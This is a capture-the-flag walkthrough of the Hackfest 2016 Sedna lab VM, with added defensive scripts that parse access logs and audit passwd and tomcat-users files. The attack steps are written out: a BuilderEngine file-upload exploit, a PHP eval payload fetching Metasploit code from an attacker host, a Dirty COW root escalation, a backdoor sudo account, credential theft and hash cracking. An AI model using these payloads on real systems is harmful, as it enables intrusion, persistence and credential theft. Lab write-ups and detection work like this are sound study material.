
Hi everyone, I did the first vuln VM from Hackfest 2016 not long ago and I want to try this one now. It's the second one by @ViperBlackSkull and the second walkthrough for me, so if you need more information you can reach me on Twitter at @marghost. You can get the virtual machine HERE. So let's get started.
First of all, let's run a quick nmap and a nikto. I had already done those, so I will just copy from my notes file. (Always keep a notepad open when you are hacking; it is the best advice I can give you.)
```text
80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp  open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          38749/udp  status
|_  100024  1          53495/tcp  status
8080/tcp open  http     Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
| smb-os-discovery:
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   NetBIOS computer name: SEDNA
|   Workgroup: WORKGROUP
|_  System time: 2017-03-17T15:38:30-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
```

```text
80
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.

8080
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
```
OK, so here we see many things. First of all we have two web servers, a Samba server that can maybe be exploited, an RPC server that may allow an unauthenticated connection to the box, and of course SSH.
I first tried to find an exploit for the RPC server but had no luck: Metasploit only had modules to DoS or crash it, and the other exploits required NFS. I turned to the web servers. The one on port 80 has a robots.txt that is of no use. I skipped to 8080 and tried to poke around Tomcat; the main exploit needs authentication, and the default username:password did not work. I tried to brute-force the password with the tomcat_mgr_login auxiliary scanner from Metasploit, and nothing was found.
So I turned my attention to the server on port 80. There is nothing interesting in the /files/ directory. The system and user directories are locked down... The README in the icons directory is nothing useful. I found something interesting in license.txt: the site uses BuilderEngine. A quick Google search showed that I can exploit this to send a reverse PHP shell.
So first of all I need to create the builderengine.php file that will send malicious code into the /files/ directory of the remote server.
```html
<!--
# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
# Date: 18/09/2016
# Exploit Author: metanubix
# Vendor Homepage: http://builderengine.org/
# Software Link: http://builderengine.org/page-cms-download.html
# Version: 3.5.0
# Tested on: Kali Linux 2.0 64 bit
# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"

1) Unauthenticated Unrestricted File Upload:

POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/

Vulnerable Parameter: files[]

We can upload test.php and reach the file via the following link:

/files/test.php
-->
<html>
<body>
<form method="post" action="http://192.168.1.16/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>
```
After that, start a PHP server and open the builderengine.php that you just created:

```shell
php -S 127.0.0.1:80
```
Start Metasploit and enter the right commands to start a web_delivery exploit:

```text
use exploit/multi/script/web_delivery
set target 1
set lhost 192.168.1.14
set payload php/meterpreter/reverse_tcp
run
```
When you run the exploit it will give you an address; just create a remotexploit.php file and fill it like this:

```php
<?php eval(file_get_contents('http://192.168.1.14:8080/9HL33yWdUR4KFo')); ?>
```
Now use the delivery form to upload this little PHP gift from Metasploit. Then Metasploit will prompt you to open a session:

```text
sessions -i 1
python -c 'import pty; pty.spawn("/bin/bash")'
```

Done, I have a shell! First win.
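From the blue-team side, the whole chain above leaves a very recognisable trace in the Apache access log: an unauthenticated POST to the jquery-file-upload handler, then a request for a .php file under /files/. The following script is an added example (not from the original post or from BuilderEngine); it parses constructed access-log lines modelled on that sequence and reports the uploads, every PHP file served from the upload directory, and the cases where the same client did both. The endpoint and directory paths are the ones named in the exploit header above; the log lines and IPs are constructed.

```python
import re

# Endpoint and directory named in the BuilderEngine 3.5.0 advisory above.
UPLOAD_ENDPOINT = "/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
UPLOAD_DIR = "/files/"

# Apache "combined"/"common" log line, reduced to the fields the check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample access log: the attacker host POSTs to the upload handler
# and then requests the dropped PHP file; a second client only browses files.
SAMPLE_LOG = """\
192.168.1.14 - - [20/Mar/2017:08:20:01 -0400] "GET /license.txt HTTP/1.1" 200 1220
192.168.1.14 - - [20/Mar/2017:08:21:10 -0400] "POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ HTTP/1.1" 200 98
192.168.1.14 - - [20/Mar/2017:08:21:15 -0400] "GET /files/remotexploit.php HTTP/1.1" 200 0
192.168.0.126 - - [20/Mar/2017:08:30:00 -0400] "GET /files/ HTTP/1.1" 200 541
192.168.0.126 - - [20/Mar/2017:08:30:05 -0400] "GET /files/report.pdf?dl=1 HTTP/1.1" 200 9001
"""


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def analyse(log_text):
    """Pull out the three signals a defender wants from this bug class."""
    uploads = []        # every POST to the unauthenticated upload handler
    php_in_files = []   # any request for a .php file under the upload directory
    correlated = []     # same client uploaded and then requested a script
    uploaders = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path = rec["ip"], rec["method"], rec["path"]
        if method == "POST" and path == UPLOAD_ENDPOINT:
            uploads.append((ip, rec["ts"]))
            uploaders.add(ip)
        elif path.startswith(UPLOAD_DIR) and path.lower().endswith(".php"):
            php_in_files.append((ip, path, rec["status"]))
            if ip in uploaders:
                correlated.append((ip, path))
    return {"uploads": uploads, "php_in_files": php_in_files, "correlated": correlated}


if __name__ == "__main__":
    for key, rows in analyse(SAMPLE_LOG).items():
        print(key, rows)
```

The fix on the server side is the usual one for upload handlers: require authentication on the endpoint, and serve the upload directory with script execution disabled so a dropped .php file is returned as text instead of run.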
A quick look tells me that this Linux kernel is vulnerable to the Dirty COW exploit:
```text
www-data@Sedna:/var/www$ uname -a
uname -a
Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
```

```text
curl https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c >dirty.c
<githubusercontent.com/FireFart/dirtycow/master/dirty.c >dirty.c
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4805  100  4805    0     0  29333      0 --:--:-- --:--:-- --:--:-- 29478
www-data@Sedna:/var/www/html/files$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
www-data@Sedna:/var/www/html/files$ ./dirty
./dirty
Please enter the new password: test
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash

mmap: b77cc000
ptrace 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.

DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!
/etc/passwd successfully backed up to /tmp/passwd.bak
Complete line:
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash

mmap: b77cc000
madvise 0
Done! Check /etc/passwd to see if the new user was created
You can log in with username firefart and password test.

DON'T FORGET TO RESTORE /etc/passwd FROM /tmp/passwd.bak !!!

192.168.1.16 - Meterpreter session 1 closed.  Reason: Died
```
Once it is exploited, ruuuun to SSH and log in as fast as you can. You are on the edge, as Dirty COW is unstable as FU** and can cause a kernel panic at any time. To make it stable you need to run one command:

```shell
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
```

It should look like this:
```text
root@kali:~# ssh firefart@192.168.1.19
firefart@192.168.1.19's password:
Added user firefart.
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Mar 20 08:25:24 EDT 2017

  System load:     0.15
  Memory usage:    2%
  Processes:       57
  Usage of /:      29.7% of 7.26GB
  Swap usage:      0%
  Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Sun Mar 12 00:41:47 2017 from 192.168.0.126
firefart@Sedna:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
firefart@Sedna:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@Sedna:~# adduser pwned
Adding user `pwned' ...
Adding new group `pwned' (1001) ...
Adding new user `pwned' (1001) with group `pwned' ...
Creating home directory `/home/pwned' ...
Copying files from `/etc/skel' ...
no talloc stackframe at ../source3/param/loadparm.c:4864, leaking memory
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for pwned
Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
Is the information correct? [Y/n]
firefart@Sedna:~# usermod -aG sudo pwned
```

As you can see here, the command is run right after the SSH login, and I create a backup root user right after, just in case something goes wrong.
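Everything the Dirty COW step leaves behind is visible in two files, which makes it a good forensic exercise: a second uid-0 account appears in /etc/passwd with its password hash stored in the passwd file itself (bypassing /etc/shadow), a new account turns up that was not in the /tmp/passwd.bak copy the exploit writes, and that account is added to the sudo group. The script below is an added example, not part of the original walkthrough; the passwd, group and baseline contents are constructed to mirror the end state of the session above, and the `audit` function and its severity labels are my own.

```python
# Constructed /etc/passwd after the steps above: Dirty COW wrote a uid-0
# "firefart" entry with the hash in the password field, then "pwned" was added.
PASSWD_NOW = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
tomcat7:x:106:114::/usr/share/tomcat7:/bin/false
crackmeforpoints:x:1000:1000::/home/crackmeforpoints:/bin/bash
firefart:fi6bS9A.C7BDQ:0:0:pwned:/root:/bin/bash
pwned:x:1001:1001:,,,:/home/pwned:/bin/bash
"""

# Constructed copy of the backup the exploit leaves in /tmp/passwd.bak.
PASSWD_BASELINE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
tomcat7:x:106:114::/usr/share/tomcat7:/bin/false
crackmeforpoints:x:1000:1000::/home/crackmeforpoints:/bin/bash
"""

# Constructed /etc/group after "usermod -aG sudo pwned".
GROUP_NOW = """\
root:x:0:
sudo:x:27:pwned
www-data:x:33:
pwned:x:1001:
"""


def parse_passwd(text):
    """Parse passwd-format lines into dicts, skipping comments and malformed rows."""
    users = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            continue
        users.append({"name": f[0], "pw": f[1], "uid": int(f[2]), "gid": int(f[3]),
                      "gecos": f[4], "home": f[5], "shell": f[6]})
    return users


def sudo_members(group_text):
    """Return the set of supplementary members of the sudo group."""
    for line in group_text.splitlines():
        f = line.split(":")
        if len(f) == 4 and f[0] == "sudo":
            return {m for m in f[3].split(",") if m}
    return set()


def audit(passwd_text, group_text, baseline_text=None):
    """Return (severity, message) findings for the persistence patterns above."""
    findings = []
    users = parse_passwd(passwd_text)
    for u in users:
        if u["uid"] == 0 and u["name"] != "root":
            findings.append(("HIGH", f"extra uid-0 account: {u['name']} (home {u['home']})"))
        if u["pw"] == "":
            findings.append(("HIGH", f"empty password field for {u['name']}"))
        elif u["pw"] not in ("x", "*", "!", "!!"):
            findings.append(("HIGH", f"password hash stored in /etc/passwd for {u['name']} (bypasses /etc/shadow)"))
    for m in sorted(sudo_members(group_text)):
        findings.append(("MEDIUM", f"sudo group member: {m}"))
    if baseline_text is not None:
        before = {u["name"] for u in parse_passwd(baseline_text)}
        for u in users:
            if u["name"] not in before:
                findings.append(("MEDIUM", f"account not present in baseline: {u['name']}"))
    return findings


if __name__ == "__main__":
    for sev, msg in audit(PASSWD_NOW, GROUP_NOW, PASSWD_BASELINE):
        print(f"[{sev}] {msg}")
```

On a real host you would feed it the live /etc/passwd and /etc/group and, as the baseline, either the /tmp/passwd.bak the exploit leaves behind or a copy taken from package or backup state; the uid-0 and hash-in-passwd checks need no baseline at all.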
I am groot! It's another win :p
Now we go fishing for flags. I found the first two flags the easy way, by running a search as root:

```text
firefart@Sedna:/# find . -name "flag.txt"
./var/www/flag.txt
./root/flag.txt
firefart@Sedna:/# cat /var/www/flag.txt
bfbb7e6e6e88d9ae66848b9aeac6b289
firefart@Sedna:/# cat /root/flag.txt
a10828bee17db751de4b936614558305
firefart@Sedna:/#
```
OK, now I need to find the two post-exploit flags. My first reflex was to go and investigate the /files/users/ directory of the port 80 server...
This was a dead end. The next thing to snoop around in was the Tomcat install that I had not been able to log in to, even after trying to brute-force the password.
A little Google search told me that Tomcat passwords are kept in '/etc/tomcat7/tomcat-users.xml'.
This is what I found:

```xml
<role rolename="manager-gui"/>
<user username="tomcat" password="submitthisforpoints" roles="manager-gui"/>
</tomcat-users>
```
Looks like I found a flag!
Now it is time to log in to the Tomcat server. Nothing to be found there.
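The reason this flag was reachable at all is that tomcat-users.xml was readable by the www-data shell, and the credential it holds carries the manager-gui role, which is exactly what the earlier brute-force against the Tomcat manager was trying to obtain. An audit of that file has two halves: who can read it, and which accounts in it hold manager or admin roles. The script below is an added example, not part of the walkthrough or of Tomcat; it wraps the fragment above into a complete document (with the xmlns attribute Tomcat 7 normally emits, which the parser tolerates either way), writes it to a temporary file with a chosen mode, and reports both problems. The role list and the `demo` helper are my own.

```python
import os
import stat
import tempfile
import xml.etree.ElementTree as ET

# Roles that grant deployment or administration rights through the manager
# and host-manager web applications.
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}

# The fragment from the walkthrough, completed into a full document (constructed;
# the second user is added only to show that unprivileged roles are ignored).
SAMPLE_XML = """<?xml version="1.0" encoding="utf-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="submitthisforpoints" roles="manager-gui"/>
  <user username="reporter" password="x" roles="probe"/>
</tomcat-users>
"""


def _local(tag):
    """Strip an XML namespace prefix such as '{http://tomcat.apache.org/xml}'."""
    return tag.rsplit("}", 1)[-1]


def privileged_users(xml_text):
    """List users whose roles include any manager/admin role."""
    root = ET.fromstring(xml_text)
    out = []
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        priv = sorted(roles & PRIVILEGED_ROLES)
        if priv:
            out.append({"username": el.get("username"), "roles": priv,
                        "has_password": el.get("password") is not None})
    return out


def audit_file(path):
    """Report world-readability and privileged accounts for a tomcat-users.xml."""
    findings = []
    mode = os.stat(path).st_mode
    if mode & stat.S_IROTH:
        findings.append(f"world-readable tomcat-users.xml (mode {stat.S_IMODE(mode):04o})")
    with open(path, encoding="utf-8") as fh:
        users = privileged_users(fh.read())
    for u in users:
        note = "credential in file" if u["has_password"] else "no password attribute"
        findings.append(f"user {u['username']} holds {', '.join(u['roles'])} ({note})")
    return findings


def demo(mode=0o644):
    """Write SAMPLE_XML to a temp file with the given mode and audit it."""
    with tempfile.NamedTemporaryFile("w", suffix=".xml", delete=False) as fh:
        fh.write(SAMPLE_XML)
        path = fh.name
    try:
        os.chmod(path, mode)
        return audit_file(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print("\n".join(demo(0o644)))
```

On a real Tomcat 7 box the same check is `audit_file("/etc/tomcat7/tomcat-users.xml")`; the file should be owned by the tomcat service user with mode 0640 or tighter, and the manager roles should only be granted to accounts that need to deploy.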
I snooped around a little more. Nothing to see in the running processes (ps -aux | less).
No special cron was used (/etc/crontab).
I found it!!! A user named crackmeforpoints is in the user list (cut -d: -f1 /etc/passwd):

```text
crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::
```

So I will try to john my way to this password overnight... almost done!
```text
root@kali:~/Downloads# john ./crack.password.db
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
```

OK, after a night John the crazy didn't crack the password, so it is a little more complex than I expected. I got the flag and the job is done for me :). Have a nice day and I will see you in the next walkthrough.
M.